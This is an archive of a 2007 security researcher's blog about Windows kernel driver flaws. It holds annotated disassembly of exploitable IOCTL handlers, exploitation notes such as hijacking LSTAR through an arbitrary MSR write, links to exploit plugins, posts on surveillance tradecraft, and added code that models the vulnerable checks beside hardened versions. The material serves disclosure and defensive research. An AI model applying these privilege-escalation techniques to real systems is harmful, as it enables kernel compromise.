01/18/2008 - Vendor Acknowledged
01/29/2008 - Vendor confirms vulnerability and plans to fix it.
02/13/2008 - Coordinated disclosure
Exploiting WDM Audio Drivers.(updated)
(Thursday, 20 December 2007) Written by Rubén
The paper has been revised and updated (01/07/2008). The last paper of the year :)
Download "Exploiting WDM Audio Drivers" v1.01
Download K-Plugin for Kartoffel: WDM Drivers checker + es1371mp.sys Exploit
Happy Winter Solstice and happy holidays. See you next year.
Reversemode's 2nd birthday
(Saturday, 24 November 2007) Written by Rubén
Today, but two years ago, I registered reversemode.com with uncertain purposes in my mind. 24 months later I do "Reversemode" for a living. To be honest I never expected such a situation, so I would like to thank those companies that, despite the fact that I was (and actually still am) a completely unknown researcher within the IT security industry, trust in me. Blah, blah, blah... the paragraph above is enough non-technical content for a post, so let's talk about interesting issues. I've already got in my hands the book titled Advanced Windows Debugging. Below is my brief review. WinDbg (*d) is the most powerful debugger ever. Nevertheless, from my point of view, there is a lack of a well-structured repository of documentation. You can read commands, tricks, tutorials... on the web; however, there is nothing similar to a centralized reference. Advanced Windows Debugging (AWD from now on) addresses this issue. This book is a brilliant reference for developers and researchers who use WinDbg on a daily basis. AWD is mainly oriented towards user-mode debugging rather than kernel, explaining in detail how to identify and deal with common software problems such as memory corruption, leaks, RPC... It's worth noting that AWD is not a security book strictly speaking. I mean its content is not directly related to exploits or something like that, but the book explains pretty well how to correctly debug Windows core components, which is important while identifying/elaborating vulnerabilities. AWD is for an intermediate/advanced public, so a decent knowledge of Windows internals is highly recommended. Perhaps the only thing I've missed is a chapter about kernel debugging :/ . Anyway, a well-written book, highly recommended if you are either a researcher or a developer. Btw, a paper titled "Exploiting Windows Audio Drivers" will be published in the next few days.
This paper covers a novel method for elevating privileges by taking advantage of a Windows design weakness in addition to third-party insecure audio drivers. A couple of related tools will also be released. Stay tuned. In November Apple and Trend Micro fixed some vulnerabilities reported by Reversemode; if you need further information take a look at the "Advisories" section.
Symantec warns of local privilege escalation 0Day in Windows. Busted.
(Wednesday, 17 October 2007) Written by Rubén
Securityfocus/bugtraq readers: the first email sent to bugtraq contains an important ERRATA (duplicated code).
Symantec researcher Elia Florio has warned, at the company's weblog, of a 0day attack in Windows XP and 2003 that allows unprivileged users to gain SYSTEM privileges via a buggy driver installed by default. In his/her post, Elia brings us an important clue: "At the moment, it's still not clear how the driver is used by Windows because this file does not have the typical Microsoft file properties present in other Windows system files". Such a file is not common, so looking for this sort of .sys we come across a couple of them. One of those drivers is secdrv.sys, which is developed by Macrovision as part of SafeDisc. Mario Ballano (48bits.com) and I have been taking a look at the driver and quickly found this interesting piece of code.
.text:00015E2C cmp [ebp+var_10], 0CA002813h
.text:00015E33 jz short loc_15E69
As you can see the IOCTL is METHOD_NEITHER, which is a potential vulnerability by itself (few drivers handle this method correctly). Let's see whether this time is different...
.text:00015ED9 call dword ptr [eax+10h] ; Internal Dispatcher
.text:00015EDC mov [ebp+var_1C], eax
.text:00015EDF cmp [ebp+var_1C], 0Ah
.text:00015EE3 jz short loc_15EFC
.text:00015EE5 mov eax, [ebp+arg_4]
.text:00015EE8 mov dword ptr [eax], 0C0000001h
.text:00015EEE mov eax, [ebp+arg_4]
.text:00015EF1 and dword ptr [eax+4], 0
.text:00015EF5 mov eax, 0C0000001h
.text:00015EFA jmp short loc_15F21
.text:00015EFC ; ---------------------------------------------------------------------------
.text:00015EFC
.text:00015EFC loc_15EFC: ; CODE XREF: sub_15E12+D1j
.text:00015EFC mov ecx, [ebp+var_4]
.text:00015EFF mov esi, [ebp+var_C]
.text:00015F02 mov eax, [ebp+arg_0]
.text:00015F05 mov edi, [eax+3Ch] ; Output Buffer (Irp->UserBuffer)
.text:00015F08 mov eax, ecx ; Inline memcpy
.text:00015F0A shr ecx, 2
.text:00015F0D rep movsd
.text:00015F0F mov ecx, eax
.text:00015F11 and ecx, 3
.text:00015F14 rep movsb
No luck. As you can see the buffer supplied by the user is not properly checked, so you can overwrite any address you wish, even kernel addresses. The first 4 DWORDs of the input buffer are copied into the output buffer without any further validation. However, there is a restriction: InputBuffer[1] should be a fixed value in order to reach this piece of code. No problem. Take a look at the exploit code. The driver copies bytes into the output buffer but also into the input buffer, so both need to be sanitized. I've released a K-plugin for kartoffel that exploits this flaw on Windows XP SP2 and 2003 (32-bit). Download at http://kartoffel.reversemode.com/downloads.php (New video added). This K-plugin can only be used for personal study and research purposes. Do not email me requesting shellcodes, customized exploits or something like that.
Although there is no patch available at the moment, we are disclosing this information since an exploit has been caught in the wild, so we see no reason to hide information that can be useful for administrators and researchers.
References:
http://www.symantec.com/enterprise/security_response/weblog/2007/10/privilege_escalation_exploit_i.html
http://www.macrovision.com
http://blog.48bits.com/?p=172 (Castilian)
Another 3rd party flaw to step into Vista Kernel.
(Monday, 01 October 2007) Written by Rubén
First off, if you haven't read skywing's quite brilliant paper about PatchGuard 3 in the latest Uninformed yet, check it out. Btw, his blog (http://www.nynaeve.net) is another jewel. So, talking about Vista, recently I came across a nice freeware program, called Speedfan, that allows controlling some thermal capabilities of your hardware. It contains a signed driver for Vista x64 so... well, you know... There is a big flaw, as you can see below (deja vu, see Joanna's IsGameOver() - NVIDIA nTune Driver vulnerability).
IOCTL: 0x9c40243C
cmp dword ptr [rdx+8], 8
jb short loc_11171
cmp dword ptr [rdx+10h], 0Ch
jb short loc_11171
mov r8d, [rsi+4] ; InputBuffer[1]
mov r9d, [rsi+8] ; InputBuffer[2]
mov rax, r8
shl rax, 20h
or rax, r9
mov rdx, rax
shr rdx, 20h
mov ecx, [rsi] ; InputBuffer[0]
wrmsr
You can overwrite (or read) any MSR you want, so hijacking LSTAR opens the kingdom's door. Therefore, this flaw allows loading unsigned drivers on Vista x64 and doing whatever misdeed your broken mind had planned. Afaik there is no public exploit that uses the method explained in Joanna's paper (I was unable to grab purplepill, so let me know if I am wrong), so I've prepared a K-plugin for kartoffel (64-bit) that exploits this issue. However, since MSR hooking is a widely known rootkit technique, don't expect to find anything really exciting. Look out! It's intended for study and/or research purposes only, so I'm not responsible in any manner for any illegal use. Download at http://kartoffel.reversemode.com/downloads.php
I guess that sooner or later Microsoft will revoke the certificate for this buggy driver; anyway the driver is going to be fixed quickly, maybe even today according to its author, so it's not a major problem. You can check the status of this bug at any time since it is publicly available through the bugtracker at http://www.bugtrack.almico.com/view.php?id=987 .
Btw, once the patch is out, I'll release an advisory for this issue with more technical details, so stay tuned.
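As an added example of the missing validation (not SpeedFan's driver or its fix; the allow-listed thermal MSRs, the buffer layout and which lengths the two size checks cover are assumptions), here are the length-only checks visible in the disassembly above, modelled in Python, beside a dispatch that also checks the MSR index before touching the hardware:

```python
import struct

# Constructed allow-list (assumption): two read-only thermal status MSRs that a
# fan-control tool might plausibly need. Nothing in this model needs wrmsr at all.
IA32_THERM_STATUS = 0x19C
IA32_PACKAGE_THERM_STATUS = 0x1B1
READABLE_MSRS = frozenset({IA32_THERM_STATUS, IA32_PACKAGE_THERM_STATUS})
WRITABLE_MSRS = frozenset()

IA32_LSTAR = 0xC0000082  # the syscall entry MSR the post names as the hijack target

# InputBuffer[0] = MSR index (ecx), [1] = high DWORD (edx), [2] = low DWORD (eax)
REQUEST = struct.Struct("<III")


def length_only_checks(input_buf, output_len):
    """Model of what the disassembly validates: two buffer lengths and nothing
    else (which lengths is my reading of the two 'jb' tests). Returns the
    (msr, value) pair that would reach wrmsr, or None when the request is rejected."""
    if len(input_buf) < REQUEST.size or output_len < 8:
        return None
    msr, hi, lo = REQUEST.unpack_from(input_buf)
    return msr, (hi << 32) | lo


def hardened_checks(input_buf, output_len, want_write):
    """Hardened dispatch (added example, not SpeedFan's fix): the same length
    checks, plus the MSR index must be allow-listed for the requested operation,
    so a well-formed request naming LSTAR is refused before any MSR access."""
    if len(input_buf) < REQUEST.size or output_len < 8:
        return "STATUS_BUFFER_TOO_SMALL"
    msr, _hi, _lo = REQUEST.unpack_from(input_buf)
    allowed = WRITABLE_MSRS if want_write else READABLE_MSRS
    if msr not in allowed:
        return "STATUS_ACCESS_DENIED"
    return "STATUS_SUCCESS"
```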
Reversemode Premium Disclosure
(Monday, 17 September 2007) Written by Rubén
Corporate post this time. Reversemode launches the Premium Disclosure service, for legal companies only.
Executive Overview
What does "Premium Disclosure" mean? Reversemode follows responsible disclosure whenever a new vulnerability is discovered. It basically means that the vendor is contacted prior to any public disclosure. Once the vendor has addressed the flaw according to its own policy, we release a public advisory with some technical details with the aim of helping researchers understand the real impact of the vulnerability. On the other hand, those customers who are subscribed to our "Premium Disclosure" service receive full technical details, including comprehensive reports, private exploits and/or related tools, at the same time the vendor is notified.
Vulnerabilities
As a customer of the Premium Disclosure service you receive vulnerabilities affecting Microsoft Windows Vista/XP/2003/2K and other leading products as well. The basic pack for a vulnerability comprises the following items:
+ Comprehensive paper explaining the flaw. Available in the following languages: English, Deutsch, Castellano.
+ Exploit/PoC and/or related tools.
+ Up-to-date information about the status of the vulnerability and how the vendor is planning to address the issue.
Advantages of Premium Disclosure
Your company gets informed months before the vulnerability is publicly disclosed, therefore you can:
+ Improve your IPS/IDS engine, signatures or security products.
+ Protect your corporate environment.
+ Study novel techniques.
+ Boost the success rate of your penetration tests.
Contact
If you are interested in this service and/or need further information, do not hesitate to contact us.
http://corporate.reversemode.com – http://www.reversemode.com
contact (at) reversemode (dot) com
Download Executive Overview "Reversemode Premium Disclosure"
Achtung, die warme kartoffel!
(Sunday, 02 September 2007) Written by Rubén
The summer is over :/ Kartoffel 1.3 is now public. This version, available for 32 and 64 bits, includes a lot of new features. If you were one of those who had enough courage to play with the initial release, you'll notice important changes. I have set up a dedicated site for this application where you can download all the stuff, read the news, documentation... http://kartoffel.reversemode.com
Download this video (VMware codec) to see Kartoffel spotting a couple of bugs in Norman AV and the old Compuware DbgMsg.sys. Please note that I have not contacted Norman AV since I was unable to find any security contact either at its website or in the OSVDB's Vendor Dictionary. In addition to the lack of contacts, you should see how Norman addresses security bugs by reading this advisory. No comments. I do responsible disclosure with responsible vendors only. Anyway, the details about the bugs are really minimal since I don't like this sort of situation in which end-users are put at (low) risk. Btw, this advisory was pending since August:
Download Advisory "CheckPoint ZoneLabs - Zone Alarm Vsdatant.sys multiple local privilege escalation vulnerabilities"
New advisory
(Wednesday, 18 July 2007) Written by Rubén
The vendor "sponsoring" (note the irony; we all know Microsoft's public policy about reporting vulnerabilities...) the advisory in July is... Microsoft. There is nothing really important to say about this issue. The flaw is another boring buffer overflow. You can read the technical details in the advisory. It's worth noting that Microsoft didn't release any security bulletin for this vulnerability. I'm still wondering why; at this point it's just a rhetorical question though. Anyway, if some visitor has any clue please let me know.
Update. Due to the feedback I've received: as far as I know Microsoft has not released any public advisory/note/warning about this flaw (I don't know the reason, so better ask Microsoft); however, the flaw has been patched according to its statements. This flaw has proven to be remotely exploitable with minimal user interaction.
Download Advisory "Microsoft DirectX RLE Compressed Targa Image File Heap Overflow"
Exploiting Common Flaws in Drivers
(Wednesday, 11 July 2007) Written by Rubén
Introduction
The number of vulnerabilities in drivers has dramatically increased; for example, Reversemode has publicly disclosed approximately 10 advisories related to driver vulnerabilities in the previous 12 months [1]. Despite the fact that there are various resources on driver exploitation [2] [3] [4] [5], there is still a lack of documentation about how to exploit an arbitrary kernel address overwrite. Even though this is the most common flaw, sometimes it is not clear whether or not the flaw may allow arbitrary code execution within the kernel context. Anyway, if you manage to modify even just one bit at a controlled kernel address, you will likely have the chance to elaborate the proper path in order to execute your own ring0 code. This paper discusses our approach for exploiting common device driver flaws. This is the initial release of the paper; it will be updated to add additional methods. This paper does not contain any vulnerability, just exploitation techniques.
Download "Exploiting Common Flaws in Drivers"
Spies wear Black Hat (II)
(Tuesday, 19 June 2007) Written by Rubén
Worth reading: The Athens Affair
Hi! First of all: no advisory this month. We continue with the second part of Spies wear Black Hat. In the first part we talked about the basic measures for countersurveillance (in a very simplistic manner). This time we are going to introduce some concepts on mobile targets, cars... it is globally called "mobile surveillance" and of course "mobile countersurveillance". Let's focus on vehicle surveillance. There are different kinds of well-known methods; one of the most famous is the Floating Box, widely used by the FBI and other agencies. You can read a lot of nice information about this complex method by googling, so no more time for it. Instead, we will explain another method called the "three man convoy". To carry out this kind of surveillance at least three vehicles are needed. In addition to that, any other external support is highly recommended. First of all, those three vehicles should be connected by RF devices in order to communicate any event whilst carrying out the surveillance. The first team vehicle is known as the "eyeball"; although it must keep its distance, it is the car that is closer to the target than any other. Behind this we find the "Back up" car, and finally the third car that comes into play is the "Tail End Charlie" (T.E.C). These positions need to be changed in order to prevent being easily noticed. For example, the eyeball, after an interval of ten minutes, becomes the T.E.C and vice versa... These changes are known as "Handsover" and should be carried out whenever the surveillance is at stake, i.e. the target is carrying out some type of counter-surveillance like quick and unexpected changes in direction, or when the target suddenly stops, maybe alerted by a suspicious behaviour. Let's see an example:
Figure 1. Surveillance convoy at Champs-Élysées avenue, Paris.
As we can see in figure 1, we have the "T" target stopped at a junction.
The "eyeball" is identified by E, the "back up" is denoted by B and finally the "TEC" is C. This time is a good chance for carrying out a handsover since the target has stopped for whatever reason. Now E finds a good place to wait (C) till the TEC passes nearby. Thus, the new convoy order is B being the "back up", E being the "eyeball" car and finally C becoming the TEC.
Figure 2. Convoy carrying out the Handsover.
What about the counter-surveillance in these cases? Well, it is quite complex. You need means, you need A LOT of means. Well, maybe I'm wrong and you are the new John Nash and you can discover complex patterns while driving at 70 mph; if so please let me know!! It's worth noting that driving at 70 mph or so, your field of vision narrows from 180° to 40°, approximately. I have developed (a couple of hours ago, so don't expect too much...) a very simplistic simulation of a piece of software for uncovering this type of mobile surveillance. Apart from the fact that you'll need a satellite for your personal use, everything is ok :). Well, I mean that it's not impossible, but actually quite complex. This simulation assumes that you are receiving data in real time from various sources, which are the vehicles moving around your target/reference point. Data can be obtained using a computer vision approach. There are hundreds of papers on traffic flow measuring, so I am not talking about anything new. First of all, this app generates Gaussian random traffic flow, then clusters this flow using the K-means algorithm; probably Expectation-Maximization would bring more accuracy to the results... We define 3 clusters, one for the TEC, another for the Backup and the last for the eyeball. Then, we choose the following features:
Euclidean Distance: This measurement is the mean of the Euclidean distance between a car and another car within a different cluster over a time variable. Why? We are assuming that the convoy maintains a security distance between the convoy's vehicles.
It should be enough to avoid being noticed but also enough to avoid losing contact. A threshold is also defined.
Surveillance Interval: Time in seconds since the car was recognized near our target and therefore added into the database of the tracking system. We assume that the surveillance convoy's uptime correlates. A threshold is defined.
Cluster: It is ideal since each convoy vehicle lies within a different cluster.
In real software, this could be accomplished by developing an SVM or a NN based on these and additional features. Once a suitable convoy has been found, the app monitors the activity of the convoy looking for a handsover, as we can see below. If a handsover is being carried out, the program warns the user.
Download "Three-man surveillance convoy Simulation"
Kartoffel disappeared?
(Saturday, 19 May 2007) Written by Rubén
I have received some feedback about why the kartoffel download is no longer available. The main reason is that version 1.0 was a sh** and it didn't work very well. Despite this fact it was able to spot some flaws. So Kartoffel has grown up during this time; it's mostly rewritten and a lot of minor bugs (and not so minor) have been fixed. Please note that Kartoffel is intended as a tool for the driver developer community; it's not a point-and-click-and-send-me-an-email-when-it-crashes fuzzer.
New features in v1.3 (Vista/XP/2k/2003):
+ Ring0 Memory Disassembler
+ Ring0 Memory Dumper
+ Display Driver object
+ Display Device security access rights.
+ SDK for building plugins in order to inject complex data into buffers.
+ Write or Read directly from/to a device, pipe...
+ FSCTL support
+ Load/Unload Drivers
...
[ Kartoffel 1.3 ] Secure your driver
Ruben Santamarta - www.reversemode.com
Usage:
-s --symbolicDos \\.\Example
-d --device \Device\example
-z --fuzzsizeinput Min,Max
-Z --fuzzsizeoutput Min,Max
-n --inputsize Size (DWORD aligned)
-o --outputsize Size (DWORD aligned)
-u --fuzzinput METHOD,SUBMETHOD
-U --fuzzoutput METHOD,SUBMETHOD
-I --fuzzioctl Min,Max
-b --FillInput FILE
-B --FillOutput FILE
-c --checkDeadlock Timeout (miliseconds)
-q --loaddriver FILE,NameofService
-w --(d)iscarddriver NameofService
-H --(S)howDrvObj \Device\name
-K --(K)ernelMem KernelAddress(Hex)
-L --(D)isassemble KernelAddress(Hex)
-S --Synchronous (default overlapped)
-p --listdevices
-r --listdrivers
-x --internalinfo
-v --VerifyType3overwrites
-g --FSCTL
-W --(U)seWriteFile
-R --(u)seReadFile
-A --(C)reatePnpUser
-D --(R)emovePnpUser
-P --(P)npConsole (ALPHA!!)
So far, this version is not public and is only available for driver developers upon request (ruben (at) reversemode (dot) com). Probably in a couple of months the public version will be released, free for all.
May Day
(Monday, 07 May 2007) Written by Rubén
Update: VMware has released an update for this advisory, adding the ESX branch to the affected products. Btw, the initial advisory I released had a wrong CVE number, now fixed. Thanks to Steven M. Christey for pointing this out. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1069
Alehop! Finally, the advisory I introduced in April is going to be released in May. Btw, no more advisories are expected to be released this month. I just open this post to provide the download link of the VMware advisory. Later on, I hope to add some stuff to this post or add another one during May, but now busy, busy, busy...
Download Advisory "VMware Products - GPF Denial of Service"
The phone is off or out of coverage.
(Saturday, 21 April 2007) Written by Rubén
Hi there! During the past year, 2006, I was reviewing dozens of drivers from the leading anti-virus companies. You can see the final outcome of this project in the "Advisories" section, which should be a bad indicator. Watch out, I am not suggesting that "xxxxx" anti-virus is better than "yyyy" or something like that. My project was focused on a very specific area and the results cannot/shouldn't be extrapolated. Whenever a driver allows unprivileged users to gain Ring0 access, it reaches an "insecurity coefficient" of 5 automatically, or automagically (Mario Ballano's language ; ) ). If your driver implements routines which allow unprivileged users to grab confidential information, or which are high-risk potential factors by themselves, your coefficient is going to be close to 10. If your driver got 10, you should be re-engineering the driver instead of patching it (from my lame point of view). It's said that an image is worth a thousand words. Please note that I've not released any advisory for McAfee; yes, it was a matter of time. Before McAfee Security Suite 2007, the older version of its Personal Firewall, which had the device MPFIREWALL, was prone to multiple local privilege escalation vulnerabilities. In April I am going to release a couple of advisories. The first one is a "seriously?-another-one?" flaw in a security software driver.
Download Advisory "CheckPoint ZoneLabs - ZoneAlarm SRESCAN local privilege escalation"
In the next few days I'll release a rare and interesting advisory, stay tuned.
Congratulations Ra! Ok, I'm really proud of my sister! She is already a Doctor in Physics. After years of quite hard work at DESY she has finally defended her thesis. For the guys at ESA and NASA who visit this page, you should take her profile into account :)! For particle physics fans:
Download thesis "Measurements of the exclusive production of a real photon with the ZEUS detector at HERA II"
Spies wear Black Hat (I)
(Tuesday, 27 March 2007) Written by Rubén
Insiders are an important threat to take into account; actually they are behind a high percentage of attacks suffered by companies. Networks and computers are being strongly protected against trojan infections, bots, worms, exploits and backdoors. Nevertheless, often while developing security policies, the countermeasures for detecting physical and electronic (not software-based) surveillance end up lying in a dirty, dark and sadly forgotten corner. That's not ok. Let's briefly see some notes on domestic and corporate countersurveillance measures.
From a corporate standpoint
Primary Threat: Industrial Espionage
Goal: Neutralize any attempt to leak confidential information.
Have you ever thought that your meeting room can be monitored while you are presenting your new-and-brilliant idea which is worth its weight in gold? There is neither anti-virus nor IDS which can detect it.
+ Maybe you are looking for a simple hidden microphone under a table. Well, it's not a big deal; take a deep look at the room and you will catch it.
+ Maybe you are looking for a more sophisticated device inside a wall or covered by a portrait. No problem, you should use a non-linear junction (semiconductors, metals...) detector. This kind of device can detect most of the commercial bugs.
+ Maybe you are looking for a high-tech RF, fiber optic or infra-red transmitter (not freely available to any person), a device which becomes invisible to non-linear junction detectors. In those cases, RF locators and thermal or infra-red cameras are going to be your best friends.
Ok, now your meeting room is free of bugs, or at least it looks like it. What about your phone line? If your line has been tapped physically, a reflectometer should spot serial or parallel bugs. Depending on the accuracy of the reflectometer you could also detect induction tappings, which do not break the line, so this kind of device (aka "snuffle bugs") is the most difficult to detect. Good!
Now your meeting room is a bug-free zone and you've got a clean phone line. Watch out... the window! There are laser microphones which basically can grab a conversation by firing a laser beam at the window; the reflected beam then carries the vibrations produced by the sound waves, so it can uncover any conversation that is taking place in the room. There are several solutions: customized glass or paints, or just a meeting room without windows :) Cool! Your meeting room is free of bugs and bugged lines and has no windows. But a room is a room, so it has at least 4 walls. There are electronic microphones which can easily listen through a wall. It is a weird possibility, but possible indeed.
From a domestic standpoint
The devices we have been talking about tend to be very expensive since they are professional equipment. People should not have to fortify their kitchen against a neighbour who is spying on them trying to steal their secret for a tasty turkey stuffing. However, we are not safe at all. Far from being paranoid, and being a realistic person, there are documented cases of hidden cameras in hotel rooms, workers being observed without legal consent, or things like that... For those cases there are hundreds of little and cheap devices that detect RF emitters. It's a good solution. However, my suggestion is that if you are curious about this kind of thing you should acquire a scanner. My scanner is an Icom IC-R3. In the European version there are no banned frequencies; unfortunately the American version has some bands banned. This scanner has a novel feature, a colour display, so you can visualize most of the wireless cams available on the market, or your favourite TV channel. The image you are seeing on the left is a shop with a wireless (Wideband FM) hidden security cam installed that I discovered some time ago. To be continued...
Working like a doozer
(Monday, 19 March 2007) Written by Rubén
Hi! Coming back in March with a couple of flaws within Apple and Microsoft products. I hope that this year I'll keep releasing at least one advisory every month. Firstly, a boring heap corruption in QuickTime. Just one comment: I uninstalled QuickTime a long time ago. If you care about your integrity, you should get rid of it.

Download Advisory "Apple Quicktime - ColorID table heap corruption"

Second, a funny flaw in a Microsoft driver, not very usual indeed. I have named it "IRQL escalation".

Download Advisory "Microsoft Windows - Ndistapi.sys IRQL escalation"

See you in April.
February advisories.
(Friday, 02 February 2007) Written by Rubén
02/07/2007 Updated to add:
Download Advisory "Trend Micro Products - Multiple local privilege escalation vulnerabilities"

Hi all, new month so new post... Intel has recently released new versions of the PRO/Wireless drivers. Some of these drivers were affected by a local kernel heap corruption vulnerability I found last summer. The severity of that flaw was very low; in addition, the bug was mitigated by a proper ACL (not very usual indeed). In fact, Intel did not consider it severe enough to release a security advisory, so the flaw has been silently fixed. Anyway, this is an explanation of that flaw.

Taking w29n51.sys (9.0.4.17) as scapegoat (results can be extrapolated to other drivers). This driver registers itself as an NDIS miniport. It registers the proper device and a DosDevice using the NDIS library:

.text:00011789 push offset aDeviceCx2ioctl ; "\\Device\\CX2IOCTL"
.text:0001178E lea eax, [ebp+var_10]
.text:00011791 push eax
.text:00011792 call ds:NdisInitUnicodeString
.text:00011798 push offset aDosdevicesCx2i ; "\\DosDevices\\CX2IOCTL"
.text:0001179D lea ecx, [ebp+var_18]
.text:000117A0 push ecx
.text:000117A1 call ds:NdisInitUnicodeString
.text:000117A7 mov edx, [ebp+arg_4]
.text:000117AA push edx
.text:000117AB push offset dword_21CED4
.text:000117B0 lea eax, [ebp+var_88]
.text:000117B6 push eax
.text:000117B7 lea ecx, [ebp+var_18]
.text:000117BA push ecx
.text:000117BB lea edx, [ebp+var_10]
.text:000117BE push edx
.text:000117BF mov eax, [ebp+arg_0]
.text:000117C2 push eax
.text:000117C3 call ds:NdisMRegisterDevice

The flaw is located within the NDIS QueryInformation handlers (OID...) dispatch routine:

.text:000118F1 loc_118F1: ; CODE XREF: sub_118B0+35↑j
.text:000118F1 mov edx, [ebp+arg_0] ; our IOCTL
.text:000118F4 mov [ebp+var_10], edx
.text:000118F7 mov eax, [ebp+var_10]
.text:000118FA sub eax, offset a1f60043e0e10a0 ; "1F60043E0E10A046E92F49"
.text:000118FF mov [ebp+var_10], eax
.text:00011902 cmp [ebp+var_10], 14h
.text:00011906 ja loc_119DC
.text:0001190C mov ecx, [ebp+var_10]
.text:0001190F movzx edx, ds:byte_11A10[ecx]
.text:00011916 jmp ds:off_119F4[edx*4]

The offset a1f60043e0e10a0 ("1F60043E0E10A046E92F49") is 0x0012E000 (.rdata section, odd!). Anyway, the IOCTL we must use is 0x0012E014.

.text:00011BB7 loc_11BB7: ; CODE XREF: sub_11B66+45↑j
.text:00011BB7 push offset aDcqueryproseto ; "dcQueryProSetOidFromIoctl"
.text:00011BBC mov eax, [ebp+arg_0]
.text:00011BBF add eax, 475BDCh
.text:00011BC4 push eax ; int
.text:00011BC5 call sub_15490
.text:00011BCA mov ecx, [ebp+arg_8]
.text:00011BCD push ecx ; size_t => InputBuffer Length
.text:00011BCE mov edx, [ebp+var_14]
.text:00011BD1 add edx, 4 ; < InputBuffer [IOM]
.text:00011BD5 mov eax, [ebp+arg_0]
.text:00011BD8 add eax, 475AD9h
.text:00011BDD push eax ; void * => Pool.sizeof(InputBuffer) [DRIVER]
.text:00011BDE call memcpy
.text:00011BE3 add esp, 0Ch

The previous code copies InputBufferLength bytes from the buffer allocated by the I/O Manager into memory allocated by the driver.

.text:00011BE6 lea ecx, [ebp+var_10]
.text:00011BE9 push ecx
.text:00011BEA mov edx, [ebp+arg_14]
.text:00011BED push edx
.text:00011BEE mov eax, [ebp+arg_10]
.text:00011BF1 push eax
.text:00011BF2 mov ecx, [ebp+arg_0]
.text:00011BF5 add ecx, 475AD9h
.text:00011BFB push ecx
.text:00011BFC mov edx, [ebp+var_4]
.text:00011BFF push edx
.text:00011C00 mov eax, [ebp+arg_0]
.text:00011C03 push eax
.text:00011C04 call sub_22578
OutputBuffer Length
.text:00011C10 mov edx, [ebp+arg_0]
.text:00011C13 add edx, 475AD9h
.text:00011C19 push edx ; void * => Pool.sizeof(InputBuffer) [DRIVER]
.text:00011C1A mov eax, [ebp+var_C]
.text:00011C1D add eax, 8 ; < *(InputBuffer+8) [IOM]
.text:00011C21 call memcpy
.text:00011C26 add esp, 0Ch

So we can overwrite 8 bytes of the adjacent pool header, one value being controlled and the other one mostly predictable. Let's see:

nt!_POOL_HEADER
+0x000 PreviousSize : Pos 0, 9 Bits
+0x000 PoolIndex : Pos 9, 7 Bits
+0x002 BlockSize : Pos 0, 9 Bits
+0x002 PoolType : Pos 9, 7 Bits
+0x000 Ulong1 : Uint4B // Controlled
+0x004 ProcessBilled : Ptr32 _EPROCESS // Adjacent pool header
+0x004 PoolTag : Uint4B
+0x004 AllocatorBackTraceIndex : Uint2B
+0x006 PoolTagHash : Uint2B

The following picture shows the process:

As we can see, if OutputBufferLength > InputBufferLength, arbitrary pool memory will be accessed during memcpy #2; however, no more memory will be overwritten, since the I/O Manager allocates the larger of InputBufferLength and OutputBufferLength for METHOD_BUFFERED IRPs.

Stay tuned for upcoming February advisories...
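The length check this handler lacks, as an added user-mode model (my construction for this page, not Intel's driver code): the driver's pool chunk, the adjacent pool header and the I/O Manager's system buffer are plain arrays, and POOL_CHUNK, the return codes and the function names are assumptions.

```c
/* Added model of the METHOD_BUFFERED IOCTL path discussed above; not the
 * driver's code. The non-paged pool and the I/O Manager's system buffer are
 * plain arrays; POOL_CHUNK and the return codes are assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define POOL_CHUNK  16                           /* assumed size of the driver's allocation */
#define HEADER_LEN  8                            /* x86 nt!_POOL_HEADER is 8 bytes */
#define ARENA_SIZE  (POOL_CHUNK + HEADER_LEN + 16)
#define SYSBUF_MAX  64                           /* capacity of the modelled system buffer */

#define STATUS_SUCCESS             0             /* model's own codes, not NTSTATUS values */
#define STATUS_INVALID_BUFFER_SIZE (-2)
#define MODEL_OUT_OF_RANGE         (-1)          /* request would leave the modelled arena */

/* Simulated pool: the driver's chunk, then the header of the adjacent chunk. */
static uint8_t pool_arena[ARENA_SIZE];

void pool_reset(void) {
    memset(pool_arena, 0, sizeof pool_arena);
    memset(pool_arena + POOL_CHUNK, 0xA5, HEADER_LEN);   /* marker: intact header */
}

const uint8_t *adjacent_header(void) { return pool_arena + POOL_CHUNK; }

/* The flow seen in the listing. sysbuf is the I/O Manager's buffer, which
 * holds max(inlen, outlen) bytes; following the listing's +4 and +8, the
 * request payload starts at offset 4 and the reply is written at offset 8.
 * memcpy #1 copies inlen bytes from sysbuf+4 into the chunk, memcpy #2 copies
 * outlen bytes from the chunk to sysbuf+8. Neither count is compared with
 * POOL_CHUNK, so an inlen above POOL_CHUNK rewrites the adjacent header and
 * an outlen above POOL_CHUNK hands adjacent pool bytes back to the caller. */
int vulnerable_ioctl(uint8_t *sysbuf, size_t inlen, size_t outlen) {
    if (inlen + 4 > SYSBUF_MAX || outlen + 8 > SYSBUF_MAX ||
        inlen > ARENA_SIZE || outlen > ARENA_SIZE)
        return MODEL_OUT_OF_RANGE;               /* the real pool has no such fence */
    memcpy(pool_arena, sysbuf + 4, inlen);       /* memcpy #1 */
    memcpy(sysbuf + 8, pool_arena, outlen);      /* memcpy #2 */
    return STATUS_SUCCESS;
}

/* Same flow with the checks the handler should make before touching memory:
 * the payload (inlen minus its 4-byte header) must fit the chunk, and the
 * reply (outlen minus its 8-byte header) may not read past the chunk. */
int hardened_ioctl(uint8_t *sysbuf, size_t inlen, size_t outlen) {
    if (inlen < 4 || inlen - 4 > POOL_CHUNK)
        return STATUS_INVALID_BUFFER_SIZE;
    if (outlen < 8 || outlen - 8 > POOL_CHUNK)
        return STATUS_INVALID_BUFFER_SIZE;
    memcpy(pool_arena, sysbuf + 4, inlen - 4);   /* copy the payload, not the whole request */
    memcpy(sysbuf + 8, pool_arena, outlen - 8);  /* never read beyond the chunk */
    return STATUS_SUCCESS;
}
```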
soon...
(Wednesday, 10 January 2007) Written by Rubén
Red pill - inside the Matrix. Blue pill - outside the Matrix. Dark pill - destroy the Matrix. I am counting the days till the iPhone arrives in Europe. I want it right now! See Steve Jobs showing off the iPhone's features and the iPhone in action: http://events.apple.com.edgesuite.net/j47d52oo/event/ Watch out for the "AppleGoo" moment while the Google CEO is talking. The future? ;)
My last exploit of the year (reloaded)
(Wednesday, 27 December 2006) Written by Rubén
